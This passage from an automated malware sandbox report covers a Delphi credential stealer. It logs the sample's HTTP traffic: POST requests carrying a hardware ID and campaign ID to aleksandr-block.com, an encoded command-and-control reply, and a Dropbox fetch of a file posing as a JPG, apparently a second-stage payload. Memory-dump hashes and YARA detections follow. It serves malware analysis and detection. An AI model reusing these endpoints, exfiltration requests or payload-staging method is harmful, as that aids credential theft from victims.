2025-01-14 07:55:39 UTC  1132  IN  HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 07:55:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=imfjh1l496m08t7l15prv65hb9; expires=Sat, 10 May 2025 01:42:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUK%2BZg2MOtvChj7qdV3hocnOS1qLfLiE5rV5uJYbo9b6JPdJPIB3W0%2F8nWPjOmFEDkUTye5C6xWO%2BeP7AttLWCrRBfyaHDUFqHri%2B4K%2FUFTS2d30xtSXzKUiAXFsZRlmGdwpl3m%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901c109f69ce4225-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1717&rtt_var=667&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2261&delivery_rate=1611479&cwnd=235&unsent_bytes=0&cid=7070876e2618fd17&ts=321&x=0"
2025-01-14 07:55:39 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-14 07:55:39 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.7  49860        188.114.96.34   443               7532  C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp  Bytes transferred  Direction  Data
2025-01-14 07:55:40 UTC  278  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=ZKRWBOLO1Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 574883
Host: aleksandr-block.com
2025-01-14 07:55:40 UTC  15331  OUT  Data Ascii: --ZKRWBOLO1YContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--ZKRWBOLO1YContent-Disposition: form-data; name="pid"1--ZKRWBOLO1YContent-Disposition: form-data; name="lid"BbL7Kk--04S--ZKRWBOLO1YContent-Di
2025-01-14 07:55:42 UTC  1131  IN  HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 07:55:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=q5m3gd5aus4ndatohbvptmm5jo; expires=Sat, 10 May 2025 01:42:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mihTghtlY6Aj57wrpC5b9D6V1quBKZNBZPZIMe2vz50%2FNXzgALbV3dfsqst96v8PV9hDjCGp5Bwm1pP%2BVjdeJDBzKrRXLxD91XHSZaRZXvOEgoV6P72Z3Jn61DZcee9YmpRVBDry"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901c10a988a10f68-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1608&rtt_var=612&sent=197&recv=592&lost=0&retrans=0&sent_bytes=2846&recv_bytes=577425&delivery_rate=1772920&cwnd=238&unsent_bytes=0&cid=8cf827aad383fa0c&ts=1805&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49876 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:42 UTC | 267 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 80
    Host: aleksandr-block.com
2025-01-14 07:55:42 UTC | 80 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 34 53 26 6a 3d 26 68 77 69 64 3d 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
    Data Ascii: act=get_message&ver=4.0&lid=BbL7Kk--04S&j=&hwid=5F3D56708871628FB960CC18D99B375A
2025-01-14 07:55:43 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 07:55:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=h6p5g7uu8bca1ktjq35671uslj; expires=Sat, 10 May 2025 01:42:22 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyjQvx%2BKu6820%2FCqVtC%2FTzYXCu6cybABg1ebKjLE7oEzSkyzbIMhEEFM6diwyHjQu1ZDuCfgKgR6k5cBKTmq1Z1FzCuYzfi%2BXcIUZ5e5vedCBNLnOymfkuytZRSfqdDiZs5EJzlT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901c10b88b2dc32c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1516&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=983&delivery_rate=1926121&cwnd=171&unsent_bytes=0&cid=e747ebb19eb1f280&ts=479&x=0"
2025-01-14 07:55:43 UTC | 242 | IN | Data Raw: 66 38 0d 0a 43 78 79 53 48 68 4f 49 47 34 66 38 49 63 39 51 52 2b 52 35 61 56 66 64 33 55 6b 67 7a 6c 67 56 2f 51 6c 35 67 6a 32 54 6c 53 39 51 5a 37 42 72 4d 62 49 35 37 34 68 56 76 79 4e 39 75 46 59 31 65 4b 71 71 50 67 36 71 4b 6e 71 4e 61 78 62 36 45 2f 44 36 51 6c 63 7a 34 58 31 2f 31 44 54 68 6c 58 33 67 4a 44 32 54 54 56 39 6d 72 4c 74 39 46 4b 41 35 65 49 70 6d 43 66 42 4a 34 76 77 65 56 7a 50 78 64 6e 4c 6d 64 65 4b 51 55 76 74 69 63 37 73 62 43 44 6d 7a 75 44 73 4f 70 43 68 79 77 6e 73 56 36 56 6a 71 71 45 68 73 61 2b 41 6e 4a 76 74 33 37 38 55 54 71 57 4a 7a 6a 68 63 50 50 62 53 76 49 31 6d 30 49 57 62 62 65 67 32 2f 42 65 66 73 56 6e 45 70 2f 53 6b 31 37 48 65 36 7a 51 50 6a 63 69 47 51 57 31 4e 6e 38 66
    Data Ascii: f8CxySHhOIG4f8Ic9QR+R5aVfd3UkgzlgV/Ql5gj2TlS9QZ7BrMbI574hVvyN9uFY1eKqqPg6qKnqNaxb6E/D6Qlcz4X1/1DThlX3gJD2TTV9mrLt9FKA5eIpmCfBJ4vweVzPxdnLmdeKQUvtic7sbCDmzuDsOpChywnsV6VjqqEhsa+AnJvt378UTqWJzjhcPPbSvI1m0IWbbeg2/BefsVnEp/Sk17He6zQPjciGQW1Nn8f
2025-01-14 07:55:43 UTC | 12 | IN | Data Raw: 38 73 41 76 52 6f 61 4b 41 3d 0d 0a
    Data Ascii: 8sAvRoaKA=
2025-01-14 07:55:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49883 | 162.125.66.18 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:43 UTC | 290 | OUT | GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: www.dropbox.com
2025-01-14 07:55:44 UTC | 4261 | IN | HTTP/1.1 302 Found
    Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-do [TRUNCATED]
    Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'nonce-ovuBZL7C34mYkcNGttZRSDeZOHA=' 'nonce-hKRMqZXwgAkcvLebe1PkZuUBShI=' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
    Content-Type: text/html; charset=utf-8
    Location: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1#
    Pragma: no-cache
    Referrer-Policy: strict-origin-when-cross-origin
    Set-Cookie: gvc=MTI5MDA1NzQ4NjAzNjE4NTg2NzgzOTIwMzA4NTg1NDg4NTkzNTAw; Path=/; Expires=Sun, 13 Jan 2030 07:55:44 GMT; HttpOnly; Secure; SameSite=None
    Set-Cookie: t=6tu5NNw7CbWRojFUkd5EdaFy; Path=/; Domain=dropbox.com; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=None
    Set-Cookie: __Host-js_csrf=6tu5NNw7CbWRojFUkd5EdaFy; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; Secure; SameSite=None
    Set-Cookie: __Host-ss=EAL7MZxH9M; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=Strict
    Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 13 Jan 2030 07:55:44 GMT
    X-Content-Type-Options: nosniff
    X-Permitted-Cross-Domain-Policies: none
    X-Robots-Tag: noindex, nofollow, noimageindex
    X-Xss-Protection: 1; mode=block
    Content-Length: 17
    Date: Tue, 14 Jan 2025 07:55:44 GMT
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    Server: envoy
    Cache-Control: no-cache, no-store
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: 1698a6e458b549fdbeef170b1a4c91a3
    Connection: close
2025-01-14 07:55:44 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
    Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49897 | 162.125.66.15 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:45 UTC | 401 | OUT | GET /cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2Gq-GsZR54eh5vxAS-adfp4y9q3FJLldfmw9w0FyJuGGMus-FkcNVlxAuTQ8Ra9WJRYaA9VqEUMfCd5FVo2eMnYMFHqbIaiWnVg_3Z1OdxGxQ9KtAX_qhrQxKC2DD/file?dl=1# HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
2025-01-14 07:55:46 UTC | 203 | IN | HTTP/1.1 400 Bad Request
    Content-Length: 1005
    Content-Type: text/html
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: local
    Date: Tue, 14 Jan 2025 07:55:45 GMT
    Server: envoy
    Connection: close
2025-01-14 07:55:46 UTC | 1005 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
    Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 400</title><link href="https://cfl.dropboxstatic.com/static/metaserve



Target ID: 1
Start time: 02:55:17
Start date: 14/01/2025
Path: C:\Users\user\Desktop\yTRd6nkLWV.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\yTRd6nkLWV.exe"
Imagebase: 0x400000
File size: 1'625'936 bytes
MD5 hash: D71663E0A0164A482C1FFC9D2C06539F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000003.1528399384.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 006DE000, based on PE: false
                                                                                                                                                                                                                                                    • Associated: 00000001.00000003.1499124135.00000000006DE000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_3_6b9000_yTRd6nkLWV.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $,5$e$f$i
                                                                                                                                                                                                                                                    • API String ID: 0-116732497
                                                                                                                                                                                                                                                    • Opcode ID: 480eca68445897ebb81ec1c6b1f04a7454999ac49a1e8948c4d45ec6081c98a7
                                                                                                                                                                                                                                                    • Instruction ID: 83364154e7f78dacc6e377b338e27e614099f9692a66cfce0d5e1496dcb29d55
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480eca68445897ebb81ec1c6b1f04a7454999ac49a1e8948c4d45ec6081c98a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D1439281E3D04FE7138B34996AB953FB1AF63218F0E45DBD1D08F1E3D668191AC322
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, Offset: 0339F000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_3_339f000_yTRd6nkLWV.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3aa0a41c89582f77f6411da687549ab5f7cf394d3ae3cf3503018ab3c913520c
                                                                                                                                                                                                                                                    • Instruction ID: 34ce328e3bbe5b8c57371b77cdc53f3f46a8a16167d6dd643e447f6424499370
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aa0a41c89582f77f6411da687549ab5f7cf394d3ae3cf3503018ab3c913520c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C852C85544E7C14FDB178B349DB96A07FB0AE13228B4E85DBC4C0CF0B3E259995AD362